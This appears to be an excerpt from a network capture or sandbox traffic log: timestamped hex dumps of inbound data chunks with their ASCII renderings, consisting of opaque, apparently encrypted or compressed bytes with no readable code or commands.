                                                                                                                                                2022-09-29 12:50:05 UTC12426INData Raw: 96 bc 82 44 da 27 70 ad ef ee 27 69 d2 35 df b8 31 27 c5 ca f3 cd 94 ac 25 8b 87 46 80 04 3d a4 b1 c1 af fc e9 e8 b6 23 e8 76 61 34 40 02 f5 bb c7 56 4b 53 bc 05 93 4d 73 a1 3b 47 e7 4f 38 f1 ec a4 51 49 66 9d da 88 2d 04 77 62 43 06 dd 84 b9 d8 8f 9a 28 1d 87 6c 7b 91 c0 0b 1c 3b b5 c9 6f 18 00 6c 53 ae d8 20 1a b0 27 80 95 d0 75 25 ff 08 25 48 74 87 70 3c 6d 8e d7 ed 4e 70 11 d5 eb cd e1 4f 4d 7c c7 9c 33 88 bf 54 14 b8 e2 d2 fa e4 5c 58 04 0b 4d e1 32 34 6b 18 8d bc d5 29 72 e7 32 ce 03 f3 48 1f 87 b1 31 9a f4 c9 a3 c3 8b 08 e4 30 14 9f 5e 48 b0 b7 de 36 52 a5 07 21 6e 48 36 98 f6 26 9f 9d 6a 6f fe be ef db 88 76 18 8b b6 67 e6 d3 94 4e a1 75 fd 67 11 01 28 aa f5 6b df cb e6 4f df bc 1c 60 ee 8f cd bf 15 82 cb 4e e3 0b 32 9d a5 16 f0 47 27 a7 5d e7 44
                                                                                                                                                Data Ascii: D'p'i51'%F=#va4@VKSMs;GO8QIf-wbC(l{;olS 'u%%Htp<mNpOM|3T\XM24k)r2H10^H6R!nH6&jovgNug(kO`N2G']D
                                                                                                                                                2022-09-29 12:50:05 UTC12442INData Raw: 66 25 17 c2 27 ed 6f 22 45 7f 29 59 7b 50 89 9f 2d e5 47 cb 73 9f a0 50 3e 52 3c 30 1c 9d 2b 3b 61 40 33 a0 11 ec d4 9a c4 08 4b 64 05 01 ca 75 4e 3e 65 1d 31 ee d8 c4 be ad 85 21 9a a4 7b c7 35 f2 ff b2 5d fc ce fe c6 90 96 37 19 0e a7 a6 69 ab 25 16 58 fc 10 32 df 3c c9 a5 db 40 e0 3a 5b 4b 27 ec 73 59 ba a6 fd 78 e1 c6 a7 64 2a 99 ad 8b dd 97 ec 4a ce 99 94 26 0c 5b 42 f8 34 95 6b 69 e6 6a ff 19 61 e2 d8 ab 33 c6 ab d0 4e 0a c5 d1 92 06 3e 2b 01 69 4d 9e 93 e5 b1 4b 97 8a 2d 1a f6 c8 d3 94 90 d3 7d 05 df 84 e6 3d c3 fc ee 67 a1 48 c0 32 f3 e2 19 95 de 94 19 45 21 a0 4e 73 5b e5 3d d3 a4 4f 66 91 9d 17 4e 7c 5e 2d 0c 1a 66 cb 63 c3 ef 21 a2 48 90 4d 4f 72 9b 43 8c 95 74 bd c8 d4 f5 c3 2f 52 dc 81 19 3e 6c f3 ce 65 5a 9b 3e dd a9 33 aa 67 9e 29 95 56 fc
                                                                                                                                                Data Ascii: f%'o"E)Y{P-GsP>R<0+;a@3KduN>e1!{5]7i%X2<@:[K'sYxd*J&[B4kija3N>+iMK-}=gH2E!Ns[=OfN|^-fc!HMOrCt/R>leZ>3g)V
                                                                                                                                                2022-09-29 12:50:05 UTC12458INData Raw: 26 06 7e b0 18 88 a2 96 35 56 66 81 09 0d 6b a4 63 00 f8 cf e2 5b f6 96 4c a1 e2 e9 7c d2 ff 51 2b 68 ae 8c 04 94 7f 9a e0 23 11 e8 9f 39 cc 0f b4 39 c1 0c dc b4 79 27 47 c8 ce b7 fc 05 29 c8 b4 5c b3 21 c3 f7 c0 56 64 2d dc 2b ec 9a 50 96 73 b6 e0 65 3e fb a9 78 9a d8 cf a5 c2 8f 3b 55 fb ec 15 93 e1 86 47 ea 1c 29 bb d5 12 28 8d f9 37 70 b4 f3 1c 4d 03 d8 89 b0 bf a2 76 26 96 fa 69 00 2b 01 21 d4 1c 87 b6 0a 60 3e 84 59 6e 73 a9 fa 68 dd a0 f0 8a f8 4a 72 de 96 9b fb 4b fe fe 42 88 44 0f 4d 53 0a 19 45 c5 46 21 3d 7b 35 cc 50 da 1b ad f9 fa f0 bf 91 6f 6b 96 73 0a d6 35 65 d3 90 50 44 51 4f d9 6c e6 20 a4 c4 5c cd 4f 33 0f 21 64 2a 87 37 d8 08 66 6a 34 a1 db 53 82 a6 60 08 b0 1c 4f a0 79 ce 8a ef c6 e9 96 b5 57 3f 0c 74 24 d7 6b d0 1a 6a 80 ce e4 aa d7
                                                                                                                                                Data Ascii: &~5Vfkc[L|Q+h#99y'G)\!Vd-+Pse>x;UG)(7pMv&i+!`>YnshJrKBDMSEF!={5Poks5ePDQOl \O3!d*7fj4S`OyW?t$kj
                                                                                                                                                2022-09-29 12:50:05 UTC12474INData Raw: 18 46 11 8a 10 89 99 bf 50 f5 7a e6 79 cb 2d e4 cf d0 2b b5 33 45 c5 31 a4 e2 08 0e 1a 2c ee 49 77 ec dc c1 60 15 80 75 04 47 96 77 d6 b4 db 58 90 2a 39 59 07 6b 91 be 42 eb 8f e0 62 c2 23 f7 37 47 5b 0b 58 aa a6 cf e6 6b a3 69 1f e3 c9 57 38 a2 52 de da 07 53 f9 df a3 05 d1 ab 34 85 dc bf 7e c3 c9 3f 56 c2 ae 3b 91 80 f6 5f 97 28 8e 2d fd a2 a9 13 b7 a4 f3 99 43 69 b1 d7 7b 82 03 54 09 9e ac b4 69 c3 40 7a 75 d9 16 5a 49 e8 e3 c9 44 04 0e a2 70 28 37 9b f1 2d fa 5c e5 d9 77 7b ad 69 a0 87 c9 54 6d 28 ca d2 9e 11 d7 9e 4a 78 9c 32 d7 3d 88 82 e0 25 f0 f8 97 c3 04 ed 7f 41 c2 0d de 9d cb f0 d4 a0 65 14 e1 fd 02 3d d8 0c c8 18 77 3f ae 24 31 21 d7 9c 5d e4 42 9b 8d 79 a4 fc 18 06 60 09 84 21 b8 c3 0e 86 5d 1b 91 b1 53 eb 64 95 ec 11 38 cf 2b c5 14 2c 1a a7
                                                                                                                                                Data Ascii: FPzy-+3E1,Iw`uGwX*9YkBb#7G[XkiW8RS4~?V;_(-Ci{Ti@zuZIDp(7-\w{iTm(Jx2=%Ae=w?$1!]By`!]Sd8+,
                                                                                                                                                2022-09-29 12:50:05 UTC12490INData Raw: 7b 7e 8a 16 c3 02 53 d0 d1 fb 62 80 1e 66 e0 0f b8 0b 6e 29 01 73 b5 5c 2f b6 0d 8a ae 05 63 e7 22 ee 40 d7 5d cf 64 b5 63 bb f4 f7 26 1a 2b 1c 6f 1b 0a 97 e0 b7 87 2d 05 0c ae 4d 85 4b ba 95 2f db 06 37 91 df 5a ca bd 62 85 b5 f2 81 8b bb 2b ef c7 51 f6 2c ef b8 2b 97 c9 cc 3c 67 34 6b 4b 27 60 ab b0 de f1 4e cc 9e e9 fb ea c8 00 5e 22 7f 9d 2e c1 71 26 91 a7 70 49 93 4f bd dd 8f 07 36 8e 83 1a 47 8e c6 1f 79 3a 05 bb 5b ce 0f 21 3c 1d a7 2c 4a 1b 6d 32 59 c4 f2 71 cc 44 6e 5c e0 70 e6 34 10 60 8b ab 78 cd 11 58 24 98 bb 2d a4 4c d2 05 0d 75 7c 12 71 0a c9 b8 d0 f5 61 00 24 c5 d6 56 73 e3 60 67 46 cc 77 3e 55 55 51 db 2d 0a a6 dc 36 79 5c df 7e 14 d4 93 48 58 34 48 e3 f0 ad 77 62 d1 0d f8 83 0d d3 bc 1c b6 44 f1 97 9f 01 6e 17 ae 7e b8 b9 ea 16 27 96 6f
                                                                                                                                                Data Ascii: {~Sbfn)s\/c"@]dc&+o-MK/7Zb+Q,+<g4kK'`N^".q&pIO6Gy:[!<,Jm2YqDn\p4`xX$-Lu|qa$Vs`gFw>UUQ-6y\~HX4HwbDn~'o
                                                                                                                                                2022-09-29 12:50:05 UTC12506INData Raw: 61 33 45 46 78 40 48 9f 62 4a fe 44 d9 55 cb 1f 30 57 eb 79 76 9c 96 e9 47 40 50 4a b9 c3 d1 f1 8f 79 98 ef 74 f0 15 aa 94 5d 27 96 b0 c4 68 51 43 d5 40 93 54 75 b5 29 af 98 ea 38 56 14 66 f9 59 d9 62 56 b4 10 c1 ed 91 f5 58 d9 ae e3 c5 c9 be 1a c8 4c 40 4d be 45 2c 50 53 6f ae ab 05 c8 71 09 e4 8a 55 22 59 e3 c9 ad e1 d5 74 a6 1f e2 1d 06 9d 64 b9 00 d4 a5 c9 c3 3d 16 1e 89 ec 8f 0c 08 a3 1a 55 f8 f5 54 f0 3d 34 d1 e8 3c e5 1c bb 04 64 53 19 cd a3 d7 97 3d 1d 77 db 1a 84 aa 2c 74 0c 4f 81 18 89 fc e2 d2 b7 64 0e 0b 0a bf a8 a2 ed e3 66 ee 48 52 0f b0 9b d2 2d 77 a0 f3 35 c6 b7 da e4 e3 1f 84 16 1c f5 77 31 67 b4 f0 a3 9f 05 5e d0 1a 3a 3f 00 4e a5 e1 00 5a 70 92 64 ad 76 2b c0 aa b0 12 5b 0f c2 9b 60 a3 ca 99 ce ee 0e f2 c1 38 9e 05 e9 6b c5 c0 72 86 29
                                                                                                                                                Data Ascii: a3EFx@HbJDU0WyvG@PJyt]'hQC@Tu)8VfYbVXL@ME,PSoqU"Ytd=UT=4<dS=w,tOdfHR-w5w1g^:?NZpdv+[`8kr)
                                                                                                                                                2022-09-29 12:50:05 UTC12522INData Raw: 68 c9 8d 29 55 b8 e5 ce 1f 8e b2 66 04 2b 7a 64 26 21 64 56 1d 41 4a 20 45 09 ac 40 cf f7 99 b9 2a a0 2f be ab 01 8e a5 45 9f ef 49 db 45 31 d4 e5 6d 15 ad b6 57 5c 3d c4 af c0 3e 5c 72 18 8e 4d 9b 5b 48 b6 4c 4d 67 81 00 a9 3f b9 5b 1f 70 b5 a8 89 2a 8b c4 af 14 e0 3a 89 46 fc bf 15 67 06 3c 2f 91 60 70 19 bb 2a 90 54 d2 29 aa 25 21 1a 1d 47 9f 91 f6 5e ed ba 0f 78 d2 dd d9 94 5e 2b 0c c6 55 1f 33 f3 c1 e3 49 7e ac ab c3 8d 90 0f 59 7e d6 b8 a4 07 52 60 87 75 46 ed 7f 19 8a 75 cd d4 1e d1 30 c8 87 2c a3 20 99 d5 a7 11 90 e6 05 94 c3 9b 9b 4a dd d9 d6 3f 14 83 ca ed 3e 19 56 5f 9e 08 47 32 35 58 81 35 21 75 c5 5b 00 f4 94 5c 5c 9e 91 de 93 22 e2 8c 84 f7 88 6d 22 fd 03 78 27 94 d8 cf 72 5a 80 df 8d d8 ef 05 60 b9 12 fb 36 26 66 ea 20 fd 6d ff 4a d7 68 3f
                                                                                                                                                Data Ascii: h)Uf+zd&!dVAJ E@*/EIE1mW\=>\rM[HLMg?[p*:Fg</`p*T)%!G^x^+U3I~Y~R`uFu0, J?>V_G25X5!u[\\"m"x'rZ`6&f mJh?
                                                                                                                                                2022-09-29 12:50:05 UTC12538INData Raw: 50 65 71 1b f7 88 a5 88 4e 39 6b 75 a4 ec 29 cc 9b 2d fc f6 b2 d6 26 b9 62 a9 ab ad 3b 67 b4 08 26 ad 07 46 ba 85 84 fd 99 4f d7 a7 9f 56 45 e1 9f 6b 5e c9 ef 2f 0e 6e ef af 7e da 54 d6 a1 40 08 d4 6a 3f 28 83 46 04 0f 7c 1d eb 65 55 17 9f bd c7 05 0e 62 97 8d 2b df d7 fe 6b b5 b9 27 5d ca 44 6f 74 28 af 70 33 56 89 07 c1 9f 68 dc bf eb e4 ae fc 88 33 b6 fa d1 cd b8 d0 96 f8 0b e2 9d 9f fb e5 70 53 28 12 ed ed 3e a7 63 dd 1b f4 dd c3 5a 42 ab 12 9d b1 34 6e 23 cf 7f e0 85 5a 5f 37 cf 83 2c ee 67 94 d8 43 00 45 43 5a 3b 50 27 e5 74 80 33 75 1c 0a 91 15 d1 39 a1 b4 75 27 d7 94 e8 32 6e 53 6e 2d e8 71 b6 24 47 04 c4 41 ba e7 8c 1e 98 ab f9 ae 50 93 6c 73 06 8f 87 90 a7 31 d6 af 56 43 7b 63 39 1b d5 96 9b 00 2e 63 27 a9 5f c6 d5 bd 6e 71 5b fe 91 77 0a 83 da
                                                                                                                                                Data Ascii: PeqN9ku)-&b;g&FOVEk^/n~T@j?(F|eUb+k']Dot(p3Vh3pS(>cZB4n#Z_7,gCECZ;P't3u9u'2nSn-q$GAPls1VC{c9.c'_nq[w
                                                                                                                                                2022-09-29 12:50:05 UTC12554INData Raw: ef 95 58 d9 cb 9e a4 fb 50 f8 5c ef f2 fe 37 ec 55 e8 bf 84 a9 0f a9 bf 3a f2 e0 fd 9c 19 1c 08 5b 3c bb 21 a3 ff 4c ba 4d 46 bb 9c 78 f7 7a 00 43 30 96 b8 7c a9 ec 66 02 3a db 3c ed 3b 9c 1d 8a 35 0a 79 d7 03 8e c2 74 7d 49 2c cd 1e 57 32 47 f7 0c f5 af 1d f2 a9 12 8f bf 10 61 b6 10 77 62 c2 07 b6 58 0c 40 3b d9 6c 20 04 c1 6d 2f ab 33 79 9e f8 06 df e5 26 1c e1 41 18 45 5d e9 45 35 53 c8 da ea 85 1e 34 f7 5e 23 3f a1 24 4b 72 56 dc c2 bf 9a 87 37 f2 28 6f e4 46 2f 15 80 25 61 fd 58 9e bb 80 8e 3d 5c 14 50 72 c2 b0 a1 c7 f9 ae 94 f1 29 14 34 27 ec 65 01 f8 a1 f1 82 81 e4 c2 91 8f 31 46 5f 57 9b 0e a7 1f 8e 41 ea 5d d4 a5 5c a8 dc b8 ca 94 dd 5a 27 ae 3d 47 80 fb c3 46 23 6b 5c 91 3a 06 15 c1 17 7d 13 a1 c8 f8 a8 b0 ac b9 67 84 88 4f 57 0e ad 96 63 60 08
                                                                                                                                                Data Ascii: XP\7U:[<!LMFxzC0|f:<;5yt}I,W2GawbX@;l m/3y&AE]E5S4^#?$KrV7(oF/%aX=\Pr)4'e1F_WA]\Z'=GF#k\:}gOWc`
                                                                                                                                                2022-09-29 12:50:05 UTC12570INData Raw: 15 c5 d4 6f 94 44 5f e0 51 30 ee a1 96 14 30 c0 8a 90 5e 6d 8a 87 23 71 70 2f 22 0e b9 fa 6d bb 4b 0a dd 87 3e 7b ea 97 7e 36 bb b4 d3 36 e4 52 5d f0 08 e9 43 51 83 5f 57 d6 1f 1e d7 24 1d 1c 34 73 89 3c 43 20 8d 28 5d 23 2e bb 8b d7 46 e4 34 17 44 98 af 2f 19 c0 35 47 b1 23 f9 dc f0 1d 87 7f a7 c6 39 70 29 62 ca 8a f1 13 61 e0 1f e6 38 d0 95 44 e9 11 79 1d fa 60 ac e9 db cf 07 13 e1 c6 07 30 e6 8a ad 6f 27 bd 72 84 c9 59 18 30 87 a2 ba 5c c2 63 57 06 6f 74 ae 29 43 23 28 0b 75 70 08 d9 f8 00 ee a0 6d 62 c1 6b 3a 44 90 46 bd 71 02 3e b8 b5 e2 f4 a3 90 ff bd 3a 3c b6 15 2b 06 58 49 c1 ff 28 51 33 4d 57 af 2f ff b2 6c dd 22 3a 10 64 65 0b 70 16 9a fc 2d 3c 25 7b 3f 5f 85 51 10 ed f4 4b 3e 09 3e d6 b2 09 73 10 95 93 97 5a 29 13 ad a6 62 d7 90 14 e9 3e c6 7a
                                                                                                                                                Data Ascii: oD_Q00^m#qp/"mK>{~66R]CQ_W$4s<C (]#.F4D/5G#9p)ba8Dy`0o'rY0\cWot)C#(upmbk:DFq>:<+XI(Q3MW/l":dep-<%{?_QK>>sZ)b>z
                                                                                                                                                2022-09-29 12:50:05 UTC12586INData Raw: 76 f4 ce 11 58 a6 9a bd 67 98 ee e4 db e5 1a 32 d9 02 4c e5 f3 05 26 6b 5b aa ca b8 60 50 03 3d cd f3 8c ae 70 9a 51 2a d3 b3 7b e0 1b 7a 53 cc 86 95 d2 e0 e8 2e 51 09 a2 b6 42 80 f2 b9 48 c7 c6 31 2c 4b 82 32 f1 41 a5 23 a3 05 17 26 a6 3b 27 7b 6c a0 14 2f 52 b0 ba cf 95 3d 2f fd 16 a7 eb 10 53 e7 89 8e 0e f4 6a 7b a6 95 02 54 28 07 5e 69 fb 63 21 58 5a a8 f9 b1 bf 92 b0 40 40 6a b9 9d 99 f8 c6 fd 88 bf 1b d8 c2 45 9a bd 8a 8e 65 6d d6 54 60 05 44 05 90 ed 62 48 b5 88 d9 73 b1 72 7f 56 0f f7 a9 bc f8 a4 17 e8 6b f6 4e 59 0a 44 7b dd b5 89 55 c7 b3 f8 81 38 8e 4c b0 61 9b 60 35 a6 63 66 4f 40 f5 f2 36 54 08 4e 70 54 b2 5e 4e b5 17 ae fd dc a8 02 68 ba c2 cc c6 a0 e7 bd ad 7d 5d c7 ba fd 48 ae d4 91 cc ee 29 1a 92 1c a6 f7 3f 90 c8 23 6f 47 94 32 42 64 4d
                                                                                                                                                Data Ascii: vXg2L&k[`P=pQ*{zS.QBH1,K2A#&;'{l/R=/Sj{T(^ic!XZ@@jEemT`DbHsrVkNYD{U8La`5cfO@6TNpT^Nh}]H)?#oG2BdM
                                                                                                                                                2022-09-29 12:50:05 UTC12602INData Raw: f2 08 d0 36 56 2b c5 16 55 55 04 ee dd b7 b1 d7 6f bb 75 41 ec a0 62 5a 01 c5 0f 03 4e bf 5a 57 97 e1 7e 35 4c 21 aa e4 1f 56 e5 19 78 10 ac c6 8e 97 a9 b3 0c 91 bc 9a 13 74 86 d4 61 66 e0 b6 9f c2 b1 2b 4c 5e 04 7e 02 a0 b2 8e aa 47 87 47 35 a9 4d 41 c3 41 25 61 f1 d9 bc 13 e1 b2 86 23 83 57 90 a3 ff 95 2a c2 41 31 7f 19 d7 db e1 9f d5 92 be 1e ae ce e5 52 a2 02 c0 94 6a 3e 39 9a 2d d3 25 62 dd bd 57 d3 4e e2 a9 fc 1f 5a 5d 3c bd 24 ce 1a 68 90 95 d4 9e 09 37 d1 d8 f7 83 15 44 73 16 7b 9d 1c 12 e6 b9 52 48 99 0c e9 29 c0 e7 0f c6 f0 2d 04 9b 75 10 6b c6 08 b8 82 75 64 43 9e 0d 8b 2f 47 28 d0 70 1b 4b 12 a2 3b 63 5c d3 40 3f 9e 06 5e 54 01 07 39 2b e2 27 fd 9f de 5d a7 ae 07 a0 06 35 df 0b bc 46 58 63 9a 5d 6c 01 64 5e 62 d2 23 05 b2 6b d0 5c 6f 4f a8 90
                                                                                                                                                Data Ascii: 6V+UUouAbZNZW~5L!Vxtaf+L^~GG5MAA%a#W*A1Rj>9-%bWNZ]<$h7Ds{RH)-ukudC/G(pK;c\@?^T9+']5FXc]ld^b#k\oO
                                                                                                                                                2022-09-29 12:50:05 UTC12618INData Raw: 40 8e a9 19 16 3e 61 0f b4 92 9a d8 ca 02 0f 1e 01 74 c8 37 6a ad 92 57 72 49 bb d8 b2 20 8f 8b a2 f6 f8 8d e6 ac 70 c7 d5 0e 13 55 18 eb 04 f1 b4 22 a7 da 8d 12 fe 45 93 41 e3 68 e5 a4 10 c8 51 b3 83 44 eb 04 87 3f 8f 7b 94 e7 14 5b 63 ca cd 41 c3 e7 77 d0 5d 25 75 7d b7 9c bf 12 83 65 bd 80 90 d1 66 d3 19 7f 7b 99 f4 4a c8 29 b2 4f 34 b7 c4 2f 81 0e 73 9a 36 af 5e ff e3 fe d6 6f 1d ac 69 6d b6 97 0d b7 f2 5e 6b 0b e3 d2 05 a4 2f c9 fd ca 2a 66 68 23 f0 31 a3 99 09 4d 1b 38 0f 35 9c f7 59 e3 29 38 9d 4d e4 c7 87 65 cd 78 0a 6f 1c 01 c6 5d 21 58 be c3 a2 c2 60 1e 94 2c 8b f8 45 cd e7 0d f2 27 a1 09 fd 59 1e 60 2a 9c 19 9c 71 c8 7c 45 ce 97 5f 86 b5 b5 2c 92 3d 95 33 e7 51 3b 70 90 34 02 2e 2e b4 35 95 7a ed 0c f5 65 a0 d9 53 98 f5 6c 84 ed ea 27 5c 37 a9
                                                                                                                                                Data Ascii: @>at7jWrI pU"EAhQD?{[cAw]%u}ef{J)O4/s6^oim^k/*fh#1M85Y)8Mexo]!X`,E'Y`*q|E_,=3Q;p4..5zeSl'\7
                                                                                                                                                2022-09-29 12:50:05 UTC12634INData Raw: 59 6b 68 d3 35 b8 21 ed 17 0a 17 00 a8 cf af d5 0e 30 dd 1b 97 7a 81 fd 9e 94 88 4f aa ab a5 95 c2 84 bd 92 2c 50 e8 58 d8 24 ba fb 3a b9 72 0f d1 87 10 48 e4 6d c8 4b 83 ca ae d8 4d 16 50 c0 9a 94 04 b6 31 f2 25 41 36 71 44 47 20 42 b6 e3 55 27 31 7d df d6 fd 8f fb cd 1f 5f 24 0e 2b 25 2a 33 6e 17 e0 eb bd 15 49 e0 60 da 14 0c 01 ec b5 41 2c ff 58 cd fd 8f bf 13 0d dc e0 5c b1 02 24 8d 4f a2 a4 1a 12 b1 89 08 c7 a1 66 d2 f2 20 76 1e 96 2e ec 2d b2 50 d3 b4 e8 5a d3 38 4d 6c 2c 33 0a a2 61 b3 66 5a 4a 50 73 e3 31 68 f5 4f 0a e9 2c 56 1d 7d c0 c3 6f ce 7f 57 a1 be 11 41 99 0e 7b 0e 3d 4c 71 53 22 59 b6 4f 40 4a e2 16 0c 2e 92 db 38 f8 ca 35 cb a8 52 9f 51 ec b2 bb 1d f1 cd 6a 8f 9b 13 95 9f 7c 1a 0f fb 91 e0 ac 9d bb 7d ac c2 85 d7 36 38 34 0b 43 99 ef b1
                                                                                                                                                Data Ascii: Ykh5!0zO,PX$:rHmKMP1%A6qDG BU'1}_$+%*3nI`A,X\$Of v.-PZ8Ml,3afZJPs1hO,V}oWA{=LqS"YO@J.85RQj|}684C
                                                                                                                                                2022-09-29 12:50:05 UTC12650INData Raw: 03 69 58 68 eb 42 c5 26 26 57 d6 51 a9 02 75 a3 f2 a2 eb ac 6a f4 75 65 12 54 8b c2 4d b5 26 80 c8 4d 89 b3 9a 98 f3 64 f7 c6 23 c8 d1 54 ba 2f b1 c8 64 ba 9b 4b 62 93 c4 62 17 81 ed 81 3e f6 82 67 7a 65 a4 30 27 aa 59 12 38 86 bf 34 87 84 01 31 cf 8b 65 f0 f4 2e 34 08 7f 1c 1b 26 48 35 41 3b 0d d5 e7 03 1a 40 b9 9a 65 88 27 7f b3 39 7c de 6d 95 d1 b9 92 ce 8f c3 ea bd 9e 7b 62 c7 41 80 64 e1 44 41 84 52 8b d5 cf 73 53 a9 c2 18 d5 de 62 55 97 0f 57 31 40 26 91 7d 29 f7 13 ea 5f e7 48 de c9 14 02 d8 89 20 36 6f b9 a3 70 15 ad ff fe 78 2b 85 ef 6c 19 6d 3d 5f 23 bd ea d1 b7 f6 86 f6 22 08 b9 1b a9 a7 d8 a9 af bb 3d d6 81 f0 19 05 0d 0a f4 eb ae cf d2 9a 6f a5 59 f7 b2 ac a1 72 90 3f 49 47 9c ff 16 92 f2 d0 71 74 50 e9 61 54 e4 4b 50 32 d7 b3 ef e9 fb 25 fc
                                                                                                                                                Data Ascii: iXhB&&WQujueTM&Md#T/dKbb>gze0'Y841e.4&H5A;@e'9|m{bAdDARsSbUW1@&})_H 6opx+lm=_#"=oYr?IGqtPaTKP2%
                                                                                                                                                2022-09-29 12:50:05 UTC12666INData Raw: cf cf b2 fd 08 f0 2c 5d 9a fe b4 54 9b 0b 3e 43 73 7a 66 db b8 6c 12 6e d6 ad e2 f9 84 8d 95 7f ae 12 aa 86 81 90 7f 8c d2 76 ac 4e 5c 0b 23 ed 4b d3 64 37 24 83 b6 cb df 6c 09 e4 ec a9 6e 8a 8a 1d 64 d3 70 ec 03 df d0 d6 97 83 b6 79 05 1c eb ab 7b 98 22 ae 28 95 26 51 45 29 2d 8c b7 65 8a fd f2 ff 4d f6 4c 5b 14 1e b4 14 de 09 08 7e 4e 31 22 12 01 77 84 2f 1e 58 a2 72 54 79 4e 00 dd f7 5c ed 62 0a 35 d0 55 aa 4d 51 1b 37 4a cc 62 b2 1e 28 2a cb 11 44 80 b0 43 64 ae 94 38 b2 d4 31 35 19 a4 e6 21 14 f3 46 94 9d f5 07 4f bb 8b fc 4f 00 af 0b 37 54 e4 80 de d3 1e a6 b0 18 f1 19 fa c0 08 e3 68 1c e4 2e 8a 19 9f 61 88 8e c0 d4 89 c8 2c b6 5f 6a 74 92 f0 16 7e 97 50 b8 44 22 c1 f6 ec 34 87 49 17 80 81 a0 a5 6c 6a e0 f7 cf 54 4c 33 46 81 b5 fd a2 b1 eb fa 99 43
                                                                                                                                                Data Ascii: ,]T>CszflnvN\#Kd7$lndpy{"(&QE)-eML[~N1"w/XrTyN\b5UMQ7Jb(*DCd815!FOO7Th.a,_jt~PD"4IljTL3FC
                                                                                                                                                2022-09-29 12:50:05 UTC12682INData Raw: ed f8 6b 1b 69 eb 44 d5 9c 92 54 aa 6e 1c e2 f5 04 df a3 2c 58 13 79 c8 03 65 e2 3b 19 bd d7 b9 cd 4e 50 27 55 a7 a3 a7 75 2b 06 10 11 d7 31 a3 b4 15 66 f3 d5 18 06 0a d8 12 cf 97 74 c7 34 ef 6a 8d 08 0a d4 cb 43 d3 b9 ac 94 c7 bc 13 6f ef d0 52 cb 3c 8a e1 fe 86 c4 ff a0 0c f5 a3 26 42 a4 7a d6 66 73 17 0f 0b 2a bc fc 3b cf 9f 0e 9b d3 84 7d bd 54 f6 6c a3 ce 92 60 f8 8c 27 7e a1 30 e2 e6 f1 50 d2 e6 e6 eb 93 3a 25 c5 c9 14 45 f5 f7 24 41 d0 0b 66 5f 8f 32 17 fa 5a ab 25 e9 07 fd 28 a0 dd c4 f2 b8 dc 14 f7 6b 22 88 e6 ff fb e5 9c b0 5e 2b 51 f3 3b 82 59 02 f8 80 0c 95 9f 1c 17 07 ab 7a c4 c4 e0 5e 1d 1f b2 c5 06 1c 59 cd bc 51 e5 d9 1f 2a b5 05 5e df 9e 17 60 f5 a9 d5 71 42 15 c4 2c 5a a2 26 1a 4b 1d 20 dd 5b d7 63 c8 d4 81 d7 7d 6b 76 79 26 54 d4 1d af
                                                                                                                                                Data Ascii: kiDTn,Xye;NP'Uu+1ft4jCoR<&Bzfs*;}Tl`'~0P:%E$Af_2Z%(k"^+Q;Yz^YQ*^`qB,Z&K [c}kvy&T
                                                                                                                                                2022-09-29 12:50:05 UTC12698INData Raw: 99 fc 69 57 9d 8e c0 7c 6f e3 12 82 75 85 ad 02 f5 7e 48 88 d0 68 98 00 2f 0e 15 1e e6 8b 02 d5 2c 64 94 0a 7f 78 59 1b bc 91 90 da 00 b9 dd ba dc 44 a0 91 f5 1f cb fa a3 b2 11 77 0c 3b 6e f3 31 e6 79 76 ed 90 f3 5b 23 77 16 bb c9 c9 8e 86 75 5a 6f 82 2b df de 6b 81 10 89 06 fb 8c 30 c7 ef 47 e3 92 eb 29 f5 28 9b 7d 27 be 2f 86 9a 21 62 6a 4e ae 07 d2 e7 9f 0f 2a 47 11 cc 99 49 6c 85 ee a7 72 18 5c 54 a4 62 18 66 1b 0a ad f8 30 0d 45 27 3e 93 b9 b6 93 1f 24 42 34 a6 f7 f2 4f a2 9d c9 09 70 a3 96 83 9f d7 db 1e cd 5d 11 ef 79 56 91 e9 b9 8e 44 c1 e0 54 ab 0a 6b 84 06 4e ec 0a 3e 4e 74 41 18 47 4c fd 36 b6 73 b2 98 e0 46 9f 18 b2 b5 e7 79 4c bc 9e a9 58 69 05 2e 74 6b cd 6a 61 a1 d3 38 fe 18 bd 10 85 10 56 4e 29 3a 75 a2 40 b6 58 9e 5c 14 b1 ba b3 0c 29 43
                                                                                                                                                Data Ascii: iW|ou~Hh/,dxYDw;n1yv[#wuZo+k0G)(}'/!bjN*GIlr\Tbf0E'>$B4Op]yVDTkN>NtAGL6sFyLXi.tkja8VN):u@X\)C
                                                                                                                                                2022-09-29 12:50:05 UTC12714INData Raw: 82 41 e5 f1 c9 0a 37 a7 34 43 3d 1a 28 0d e4 35 88 fb 75 67 f0 21 4f bd 55 d5 79 33 b8 51 46 ac c0 fd 1f 39 12 bc 13 bd 7d f8 3f 4f 4c 30 07 bc 38 c8 8d 6c 89 10 fe 1d 35 ff ba 13 a4 5a 8d e9 33 cf 8e 32 16 29 e9 03 08 75 2b bd 5b ce 72 e1 71 51 46 74 1a e1 dc 94 3c 2f 72 e6 94 51 2c 54 7d a1 27 dd bc 7a e2 69 e4 ba 8e 80 b7 a5 41 5a 3b 2f 90 e0 67 75 16 7e cc ae 93 7a 64 07 cd 91 ad 01 a7 65 fd 75 6f 80 ab 6f a0 46 e1 b2 f9 3a d7 3b 46 f7 03 db 7b 58 6b ac c5 6f 6c 02 74 74 2a ba 3a 1f 9b b5 85 be 3f ae f5 64 16 6f 8a cd 23 11 b8 04 6d b9 b8 22 9c 7e d0 e6 77 19 ff 64 fa f6 a4 0b 53 72 14 c4 60 75 71 2e d2 09 f2 1c 46 c4 6a aa 95 d0 39 c3 32 c0 72 11 82 28 4e 7e 1e 22 6a df 77 9b fe 0a cf 05 e0 72 94 9f d1 13 fd e9 3c 8a 43 52 13 d2 a3 89 ee 0c 64 a5 4a
                                                                                                                                                Data Ascii: A74C=(5ug!OUy3QF9}?OL08l5Z32)u+[rqQFt</rQ,T}'ziAZ;/gu~zdeuooF:;F{Xkoltt*:?do#m"~wdSr`uq.Fj92r(N~"jwr<CRdJ
